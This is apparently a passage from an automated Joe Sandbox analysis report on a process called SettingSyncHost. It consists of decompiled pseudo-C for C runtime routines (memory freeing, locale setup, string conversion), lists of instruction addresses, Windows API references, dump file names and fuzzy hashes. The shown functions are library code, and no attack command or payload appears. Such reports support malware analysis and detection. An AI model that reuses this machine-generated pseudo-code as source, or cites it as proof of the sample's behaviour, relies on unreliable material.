				return _t61 | 0xffffffff;
			}






























                                                                                                                                      0x003a3169
                                                                                                                                      0x003a316f
                                                                                                                                      0x003a3173
                                                                                                                                      0x003a3174
                                                                                                                                      0x003a3175
                                                                                                                                      0x003a3180
                                                                                                                                      0x003a318a
                                                                                                                                      0x003a3190
                                                                                                                                      0x003a3195
                                                                                                                                      0x003a319b
                                                                                                                                      0x003a319d
                                                                                                                                      0x003a31d5
                                                                                                                                      0x003a31d7
                                                                                                                                      0x003a31db
                                                                                                                                      0x003a32ef
                                                                                                                                      0x003a32ef
                                                                                                                                      0x003a32ef
                                                                                                                                      0x003a32f1
                                                                                                                                      0x003a32f6
                                                                                                                                      0x003a32fc
                                                                                                                                      0x003a32fe
                                                                                                                                      0x003a3301
                                                                                                                                      0x003a330e
                                                                                                                                      0x003a330e
                                                                                                                                      0x003a3312
                                                                                                                                      0x003a3314
                                                                                                                                      0x003a331b
                                                                                                                                      0x003a3320
                                                                                                                                      0x003a3322
                                                                                                                                      0x003a3322
                                                                                                                                      0x003a3316
                                                                                                                                      0x003a3318
                                                                                                                                      0x003a3318
                                                                                                                                      0x003a332c
                                                                                                                                      0x003a332e
                                                                                                                                      0x003a3331
                                                                                                                                      0x003a3375
                                                                                                                                      0x003a3375
                                                                                                                                      0x003a3375
                                                                                                                                      0x003a3375
                                                                                                                                      0x003a3379
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3333
                                                                                                                                      0x003a3333
                                                                                                                                      0x003a3335
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3338
                                                                                                                                      0x003a333e
                                                                                                                                      0x003a3340
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3342
                                                                                                                                      0x003a3347
                                                                                                                                      0x003a3349
                                                                                                                                      0x003a334c
                                                                                                                                      0x003a3354
                                                                                                                                      0x003a3357
                                                                                                                                      0x003a3359
                                                                                                                                      0x003a3359
                                                                                                                                      0x003a3359
                                                                                                                                      0x003a3359
                                                                                                                                      0x003a334e
                                                                                                                                      0x003a334e
                                                                                                                                      0x003a334e
                                                                                                                                      0x003a3362
                                                                                                                                      0x003a3366
                                                                                                                                      0x003a336c
                                                                                                                                      0x003a336e
                                                                                                                                      0x003a339c
                                                                                                                                      0x003a339c
                                                                                                                                      0x003a3397
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3370
                                                                                                                                      0x003a3370
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3370
                                                                                                                                      0x003a336e
                                                                                                                                      0x003a3331
                                                                                                                                      0x003a3303
                                                                                                                                      0x003a3306
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3308
                                                                                                                                      0x003a337f
                                                                                                                                      0x003a337f
                                                                                                                                      0x003a3380
                                                                                                                                      0x003a3380
                                                                                                                                      0x003a338f
                                                                                                                                      0x003a3395
                                                                                                                                      0x003a3395
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3395
                                                                                                                                      0x003a31e1
                                                                                                                                      0x003a31e4
                                                                                                                                      0x003a31e6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a31ec
                                                                                                                                      0x003a31ee
                                                                                                                                      0x003a31f1
                                                                                                                                      0x003a31fb
                                                                                                                                      0x003a31fe
                                                                                                                                      0x003a3200
                                                                                                                                      0x003a3202
                                                                                                                                      0x003a3202
                                                                                                                                      0x003a3204
                                                                                                                                      0x003a320a
                                                                                                                                      0x003a3277
                                                                                                                                      0x003a3277
                                                                                                                                      0x003a3279
                                                                                                                                      0x003a327b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a327d
                                                                                                                                      0x003a327d
                                                                                                                                      0x003a3280
                                                                                                                                      0x003a3282
                                                                                                                                      0x003a3285
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3287
                                                                                                                                      0x003a328a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a328f
                                                                                                                                      0x003a3291
                                                                                                                                      0x003a3294
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3296
                                                                                                                                      0x003a3299
                                                                                                                                      0x003a32a6
                                                                                                                                      0x003a32b3
                                                                                                                                      0x003a32bf
                                                                                                                                      0x003a32c6
                                                                                                                                      0x003a32ce
                                                                                                                                      0x003a32d2
                                                                                                                                      0x003a32d8
                                                                                                                                      0x003a32da
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a32e0
                                                                                                                                      0x003a32e0
                                                                                                                                      0x003a32e0
                                                                                                                                      0x00000000
                                                                                                                                      0x003a32e0
                                                                                                                                      0x003a329c
                                                                                                                                      0x003a32a2
                                                                                                                                      0x003a32a4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a32e3
                                                                                                                                      0x003a32e3
                                                                                                                                      0x003a32e7
                                                                                                                                      0x003a32e8
                                                                                                                                      0x003a32eb
                                                                                                                                      0x003a32eb
                                                                                                                                      0x00000000
                                                                                                                                      0x003a320c
                                                                                                                                      0x003a320c
                                                                                                                                      0x003a3211
                                                                                                                                      0x003a3215
                                                                                                                                      0x003a321c
                                                                                                                                      0x003a321e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3220
                                                                                                                                      0x003a3227
                                                                                                                                      0x003a322d
                                                                                                                                      0x003a322f
                                                                                                                                      0x003a3231
                                                                                                                                      0x003a3264
                                                                                                                                      0x003a3264
                                                                                                                                      0x003a3267
                                                                                                                                      0x003a326d
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a326f
                                                                                                                                      0x003a3233
                                                                                                                                      0x003a3233
                                                                                                                                      0x003a3236
                                                                                                                                      0x003a3236
                                                                                                                                      0x003a323a
                                                                                                                                      0x003a323e
                                                                                                                                      0x003a3242
                                                                                                                                      0x003a3246
                                                                                                                                      0x003a324c
                                                                                                                                      0x003a3252
                                                                                                                                      0x003a3258
                                                                                                                                      0x003a325d
                                                                                                                                      0x003a3260
                                                                                                                                      0x003a3260
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3236
                                                                                                                                      0x003a3271
                                                                                                                                      0x00000000
                                                                                                                                      0x003a3271
                                                                                                                                      0x003a320a
                                                                                                                                      0x003a319f
                                                                                                                                      0x003a319f
                                                                                                                                      0x003a31a2
                                                                                                                                      0x003a31a2
                                                                                                                                      0x003a31a6
                                                                                                                                      0x003a31ac
                                                                                                                                      0x003a31af
                                                                                                                                      0x003a31b5
                                                                                                                                      0x003a31b9
                                                                                                                                      0x003a31bc
                                                                                                                                      0x003a31bf
                                                                                                                                      0x003a31c5
                                                                                                                                      0x003a31c8
                                                                                                                                      0x003a31d1
                                                                                                                                      0x003a31d1
                                                                                                                                      0x00000000
                                                                                                                                      0x003a31a2
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 003A3169
                                                                                                                                      • __calloc_crt.LIBCMT ref: 003A3175
                                                                                                                                        • Part of subcall function 0039A7FF: Sleep.KERNEL32(00000000), ref: 0039A827
                                                                                                                                      • __calloc_crt.LIBCMT ref: 003A3215
                                                                                                                                      • GetFileType.KERNEL32(?), ref: 003A329C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __calloc_crt$FileInfoSleepStartupType
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 591920814-0
                                                                                                                                      • Opcode ID: 350c3149d17593bb1ac8d39a9b6c32db10434c701931cbc5b113c54ebca5ce33
                                                                                                                                      • Instruction ID: 30ad07089f22ee99dd9d1ad8e8814b0ac7b4dd7b154f32403c3ba67e814bed3c
                                                                                                                                      • Opcode Fuzzy Hash: 350c3149d17593bb1ac8d39a9b6c32db10434c701931cbc5b113c54ebca5ce33
                                                                                                                                      • Instruction Fuzzy Hash: C06126719043418FDB21DB69C889B297BE4FF07330F294A68E566CB2E2DB30DA45C749
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EB779, Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3409252457-0
                                                                                                                                      • Opcode ID: 1949e402bbb25cddfa9b279a2877cbbd9bd7e85b83b10d8beb4112dae9edd2fe
                                                                                                                                      • Instruction ID: c62ebef45b4c31d62b5a6b8b0ec16d8d7db88ecd275bd20f1d9fe03f077de5a7
                                                                                                                                      • Opcode Fuzzy Hash: 1949e402bbb25cddfa9b279a2877cbbd9bd7e85b83b10d8beb4112dae9edd2fe
                                                                                                                                      • Instruction Fuzzy Hash: CC5108709003E5AFDB23AF778891A6FB7A8EF01310F154369FA51AB3C2DB7589408B51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DA90E, Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 003DA957
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003DA983
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 003DA9C2
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003DA9DF
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 003DAA1E
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003DAA3B
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003DAA7D
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003DAAA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2040435927-0
                                                                                                                                      • Opcode ID: 2244264fa532c877fd35a8bc718995daf64b8d3377b87a9db5886367d52b7406
                                                                                                                                      • Instruction ID: 0b917dfa186fce94b2de42e1c620abb58df4cb8ef75c1f18403dda5c03ef263d
                                                                                                                                      • Opcode Fuzzy Hash: 2244264fa532c877fd35a8bc718995daf64b8d3377b87a9db5886367d52b7406
                                                                                                                                      • Instruction Fuzzy Hash: 9C51D27361060AAFDB229F60EE40FBB7BA9EF44750F164626F904AA250DB708D10CB52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E2D63, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • _free.LIBCMT ref: 003E304E
                                                                                                                                      • _free.LIBCMT ref: 003E3067
                                                                                                                                      • _free.LIBCMT ref: 003E30A5
                                                                                                                                      • _free.LIBCMT ref: 003E30AE
                                                                                                                                      • _free.LIBCMT ref: 003E30BA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorLast
                                                                                                                                      • String ID: C
                                                                                                                                      • API String ID: 3291180501-1037565863
                                                                                                                                      • Opcode ID: 2cf2ba8c186e28878a0d09a41ac1a2f6b740d1214b0d6aa128535b16913594d6
                                                                                                                                      • Instruction ID: acba5d3de2bfe3fe44277ba030ef6d3065984761ae6935739b054315d13d821e
                                                                                                                                      • Opcode Fuzzy Hash: 2cf2ba8c186e28878a0d09a41ac1a2f6b740d1214b0d6aa128535b16913594d6
                                                                                                                                      • Instruction Fuzzy Hash: 29B15075901669DFDB26DF15C888AAEB3B5FF48304F1146ADE84AA7390D731AE90CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E8CC2, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                      • Opcode ID: 91efcb46d0947f7c3824b771c00d8f326d2aa7a26031867f9de1a099e02e8b30
                                                                                                                                      • Instruction ID: b206bc30c633627d98b4ffb20440afb551a7f685478d1fc177ab9914cb875d52
                                                                                                                                      • Opcode Fuzzy Hash: 91efcb46d0947f7c3824b771c00d8f326d2aa7a26031867f9de1a099e02e8b30
                                                                                                                                      • Instruction Fuzzy Hash: 6621A872E016B4ABCB235B669C44A6B776C9F117A0F260711E909AB2E1DF70DD00D5E0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003ECE7C, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003ECBC8: _free.LIBCMT ref: 003ECBED
                                                                                                                                      • _free.LIBCMT ref: 003ECECA
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003ECED5
                                                                                                                                      • _free.LIBCMT ref: 003ECEE0
                                                                                                                                      • _free.LIBCMT ref: 003ECF34
                                                                                                                                      • _free.LIBCMT ref: 003ECF3F
                                                                                                                                      • _free.LIBCMT ref: 003ECF4A
                                                                                                                                      • _free.LIBCMT ref: 003ECF55
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: 170cdc25c2c107f089e5fe9c92c420492c2528102a38fb1041c96f72bd0f2f2d
                                                                                                                                      • Instruction ID: a905d79d771a29c02476ff7cbf61071c95bbaf16f809a2c9eb7512af26b9880d
                                                                                                                                      • Opcode Fuzzy Hash: 170cdc25c2c107f089e5fe9c92c420492c2528102a38fb1041c96f72bd0f2f2d
                                                                                                                                      • Instruction Fuzzy Hash: 9F119372591BA4BAD662B7B2CC07FCF779C5F04700F411E14F29A6E1D2DA36B9064750
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00393DCC, Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E00393DCC(void* __ebx, void* __edi, void* __esi, void* __eflags, LONG** _a4) {
				signed int _v8;
				void* _t10;
				LONG* _t13;
				LONG* _t18;
				LONG** _t33;

				_t31 = __edi;
				_t24 = __ebx;
				_push(8);
				_push(0x3c5d30);
				_t10 = E0039A560(__ebx, __edi, __esi);
				_t33 = _a4;
				if(_t33 != 0) {
					E00399DC7(__ebx, __edi, 0xd);
					_v8 = _v8 & 0x00000000;
					_t13 = _t33[1];
					if(_t13 != 0 && InterlockedDecrement(_t13) == 0) {
						_t22 = _t33[1];
						if(_t33[1] != 0x3c7600) {
							E00399DFA(_t22);
						}
					}
					_v8 = 0xfffffffe;
					E00393DB7();
					if( *_t33 != 0) {
						E00399DC7(_t24, _t31, 0xc);
						_v8 = 1;
						E00399323( *_t33);
						_t18 =  *_t33;
						if(_t18 != 0 &&  *_t18 == 0 && _t18 != 0x3c7210) {
							E003993BC(_t18);
						}
						_v8 = 0xfffffffe;
						E00393DC3();
					}
					 *_t33 = 0xbaadf00d;
					_t33[1] = 0xbaadf00d;
					_t10 = E00399DFA(_t33);
				}
				return E0039A5A5(_t10);
			}








                                                                                                                                      0x00393dcc
                                                                                                                                      0x00393dcc
                                                                                                                                      0x00393d0a
                                                                                                                                      0x00393d0c
                                                                                                                                      0x00393d11
                                                                                                                                      0x00393d16
                                                                                                                                      0x00393d1b
                                                                                                                                      0x00393d23
                                                                                                                                      0x00393d29
                                                                                                                                      0x00393d2d
                                                                                                                                      0x00393d32
                                                                                                                                      0x00393d3f
                                                                                                                                      0x00393d47
                                                                                                                                      0x00393d4a
                                                                                                                                      0x00393d4f
                                                                                                                                      0x00393d47
                                                                                                                                      0x00393d50
                                                                                                                                      0x00393d57
                                                                                                                                      0x00393d5f
                                                                                                                                      0x00393d63
                                                                                                                                      0x00393d69
                                                                                                                                      0x00393d72
                                                                                                                                      0x00393d78
                                                                                                                                      0x00393d7c
                                                                                                                                      0x00393d8b
                                                                                                                                      0x00393d90
                                                                                                                                      0x00393d91
                                                                                                                                      0x00393d98
                                                                                                                                      0x00393d98
                                                                                                                                      0x00393da2
                                                                                                                                      0x00393da4
                                                                                                                                      0x00393da8
                                                                                                                                      0x00393dad
                                                                                                                                      0x00393db3

                                                                                                                                      APIs
                                                                                                                                      • __lock.LIBCMT ref: 00393D23
                                                                                                                                        • Part of subcall function 00399DC7: __mtinitlocknum.LIBCMT ref: 00399DDD
                                                                                                                                        • Part of subcall function 00399DC7: __amsg_exit.LIBCMT ref: 00399DE9
                                                                                                                                        • Part of subcall function 00399DC7: EnterCriticalSection.KERNEL32(00000001,00000001,?,003997EE,0000000D), ref: 00399DF1
                                                                                                                                      • InterlockedDecrement.KERNEL32(00000000), ref: 00393D35
                                                                                                                                      • _free.LIBCMT ref: 00393D4A
                                                                                                                                        • Part of subcall function 00399DFA: HeapFree.KERNEL32(00000000,00000000,?,003998C2,00000000), ref: 00399E10
                                                                                                                                        • Part of subcall function 00399DFA: GetLastError.KERNEL32(00000000,?,003998C2,00000000), ref: 00399E22
                                                                                                                                      • __lock.LIBCMT ref: 00393D63
                                                                                                                                      • ___removelocaleref.LIBCMT ref: 00393D72
                                                                                                                                      • ___freetlocinfo.LIBCMT ref: 00393D8B
                                                                                                                                      • _free.LIBCMT ref: 00393DA8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 556454624-0
                                                                                                                                      • Opcode ID: 462202dbb0012538e2aa7d22571102c3730b93f89507c09fdf16afc2c3b718d8
                                                                                                                                      • Instruction ID: 725667828f60b6017fae6f3ffcf4e6282461747d8db97d514235a78c06464022
                                                                                                                                      • Opcode Fuzzy Hash: 462202dbb0012538e2aa7d22571102c3730b93f89507c09fdf16afc2c3b718d8
                                                                                                                                      • Instruction Fuzzy Hash: C31182B16017009BEF33AF68985AB5E73A4AF01720F21451DF499DF1D1DB74DE80CA95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003997A4, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E003997A4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x3c5e78);
				E0039A560(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x3c2fd8;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x3c7600;
				E00399DC7(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E00399846();
				E00399DC7(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x3c72e8; // 0x3c7210
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00399294( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E0039A5A5(E0039984F());
			}







                                                                                                                                      0x003997a4
                                                                                                                                      0x003997a4
                                                                                                                                      0x003997a6
                                                                                                                                      0x003997ab
                                                                                                                                      0x003997b5
                                                                                                                                      0x003997bb
                                                                                                                                      0x003997be
                                                                                                                                      0x003997c5
                                                                                                                                      0x003997cc
                                                                                                                                      0x003997cf
                                                                                                                                      0x003997d2
